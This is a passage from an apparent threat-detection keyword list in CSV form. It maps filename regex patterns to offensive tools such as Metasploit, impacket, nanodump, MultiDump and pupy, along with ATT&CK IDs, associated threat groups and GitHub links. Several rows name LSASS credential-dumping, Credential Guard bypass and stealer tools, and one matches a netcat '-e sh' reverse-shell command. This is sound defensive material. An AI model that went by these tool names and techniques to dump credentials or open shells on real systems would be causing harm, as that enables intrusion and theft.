Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","16679"
"*\msfupdate.log*",".{0,1000}\\msfupdate\.log.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","16680"
"*\msfupdate.ps1*",".{0,1000}\\msfupdate\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","16681"
"*\msfvenom.bat*",".{0,1000}\\msfvenom\.bat.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","16682"
"*\msfwrapper.bat*",".{0,1000}\\msfwrapper\.bat.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","16683"
"*\Mshikaki.cpp*",".{0,1000}\\Mshikaki\.cpp.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tool","https://github.com/trevorsaudi/Mshikaki","1","0","N/A","N/A","9","2","135","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z","16684"
"*\msi_search.c*",".{0,1000}\\msi_search\.c.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","N/A","10","3","276","31","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z","16685"
"*\msi_search.exe*",".{0,1000}\\msi_search\.exe.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","N/A","10","3","276","31","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z","16686"
"*\msi_search.ps1*",".{0,1000}\\msi_search\.ps1.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","N/A","10","3","276","31","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z","16687"
"*\msi_search.x64.o*",".{0,1000}\\msi_search\.x64\.o.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","N/A","10","3","276","31","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z","16688"
"*\msi_search.x86.o*",".{0,1000}\\msi_search\.x86\.o.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","N/A","10","3","276","31","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z","16689"
"*\msol.py*",".{0,1000}\\msol\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16690"
"*\MSOL\DomainCompanyInfo.txt*",".{0,1000}\\MSOL\\DomainCompanyInfo\.txt.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","0","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","16691"
"*\mssprinkler.ps1*",".{0,1000}\\mssprinkler\.ps1.{0,1000}","offensive_tool_keyword","MSSprinkler","password spraying utility for organizations to test their M365 accounts from an external perspective. It employs a 'low-and-slow' approach","T1110.003 - T1110.001","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/TheresAFewConors/MSSprinkler","1","0","N/A","N/A","9","1","74","7","2025-02-25T13:32:41Z","2024-09-15T09:54:53Z","16696"
"*\mssql_priv.py*",".{0,1000}\\mssql_priv\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16697"
"*\MSSQL-Clear-Text-Password-*.txt*",".{0,1000}\\MSSQL\-Clear\-Text\-Password\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","16698"
"*\mssqlclient.py*",".{0,1000}\\mssqlclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16699"
"*\mssqlinstance.py*",".{0,1000}\\mssqlinstance\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16700"
"*\MSSQL-NTLMv1-Client-*.txt*",".{0,1000}\\MSSQL\-NTLMv1\-Client\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","16701"
"*\MSSQL-NTLMv2-Client-*.txt*",".{0,1000}\\MSSQL\-NTLMv2\-Client\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","16702"
"*\mstscfox.dll*",".{0,1000}\\mstscfox\.dll.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","16703"
"*\MultiDump.c*",".{0,1000}\\MultiDump\.c.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","16704"
"*\MultiDump.exe*",".{0,1000}\\MultiDump\.exe.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","0","N/A","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","16705"
"*\MultiDump.exe*",".{0,1000}\\MultiDump\.exe.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","16706"
"*\MultiDump.sln*",".{0,1000}\\MultiDump\.sln.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","16707"
"*\MultiDump.vcxproj*",".{0,1000}\\MultiDump\.vcxproj.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","16708"
"*\MutationGate.cpp*",".{0,1000}\\MutationGate\.cpp.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","N/A","8","3","251","34","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z","16710"
"*\MutationGate.exe*",".{0,1000}\\MutationGate\.exe.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","N/A","8","3","251","34","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z","16711"
"*\MutationGate.sln*",".{0,1000}\\MutationGate\.sln.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","N/A","8","3","251","34","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z","16712"
"*\MutationGate.vcxproj*",".{0,1000}\\MutationGate\.vcxproj.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","N/A","8","3","251","34","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z","16713"
"*\mystikal.py*",".{0,1000}\\mystikal\.py.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/D00MFist/Mystikal","1","0","N/A","N/A","9","4","305","39","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z","16716"
"*\NamedPipeClient.exe*",".{0,1000}\\NamedPipeClient\.exe.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","16719"
"*\NamedPipeClient.exe*",".{0,1000}\\NamedPipeClient\.exe.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","16720"
"*\NamedPipeEventDatabase.cpp*",".{0,1000}\\NamedPipeEventDatabase\.cpp.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","16721"
"*\NamedPipeMaster.sln*",".{0,1000}\\NamedPipeMaster\.sln.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","16722"
"*\NamedPipeMasterBase\*",".{0,1000}\\NamedPipeMasterBase\\.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","16723"
"*\NamedPipeMaster-main*",".{0,1000}\\NamedPipeMaster\-main.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","16724"
"*\NamelessC2.*",".{0,1000}\\NamelessC2\..{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","N/A","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","16725"
"*\NamelessLog.txt*",".{0,1000}\\NamelessLog\.txt.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","N/A","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","16726"
"*\nanodump*",".{0,1000}\\nanodump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","16727"
"*\nanodump.c*",".{0,1000}\\nanodump\.c.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","16728"
"*\nanodump.py*",".{0,1000}\\nanodump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16729"
"*\nanorobeus-main.zip*",".{0,1000}\\nanorobeus\-main\.zip.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","16730"
"*\NativeBypassCredGuard.sln*",".{0,1000}\\NativeBypassCredGuard\.sln.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","0","N/A","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","16731"
"*\NativeBypassCredGuard_C++*",".{0,1000}\\NativeBypassCredGuard_C\+\+.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","0","N/A","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","16732"
"*\NativeBypassCredGuard-main*",".{0,1000}\\NativeBypassCredGuard\-main.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","0","N/A","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","16733"
"*\NativeDump.csproj*",".{0,1000}\\NativeDump\.csproj.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","16734"
"*\NativeDump.exe*",".{0,1000}\\NativeDump\.exe.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","16735"
"*\NativeDump.sln*",".{0,1000}\\NativeDump\.sln.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","16736"
"*\NativeDump\Program.cs*",".{0,1000}\\NativeDump\\Program\.cs.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","16737"
"*\navicatpwd.exe*",".{0,1000}\\navicatpwd\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16738"
"*\nbnsspoof.py*",".{0,1000}\\nbnsspoof\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","16739"
"*\nbtscan.py*",".{0,1000}\\nbtscan\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16740"
"*\nc.exe * -e sh*",".{0,1000}\\nc\.exe\s.{0,1000}\s\-e\ssh.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","16741"
"*\nc_srv.bat",".{0,1000}\\nc_srv\.bat","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","16744"
"*\ndroRat Binder.exe*",".{0,1000}\\ndroRat\sBinder\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16753"
"*\Necro-Stealer-*.zip*",".{0,1000}\\Necro\-Stealer\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Necro-Stealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006  - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/Necro-Stealer","1","0","N/A","N/A","8","1","6","1","2022-12-06T16:06:55Z","2022-12-06T15:52:17Z","16754"
"*\nemty_v1.txt*",".{0,1000}\\nemty_v1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","16755"
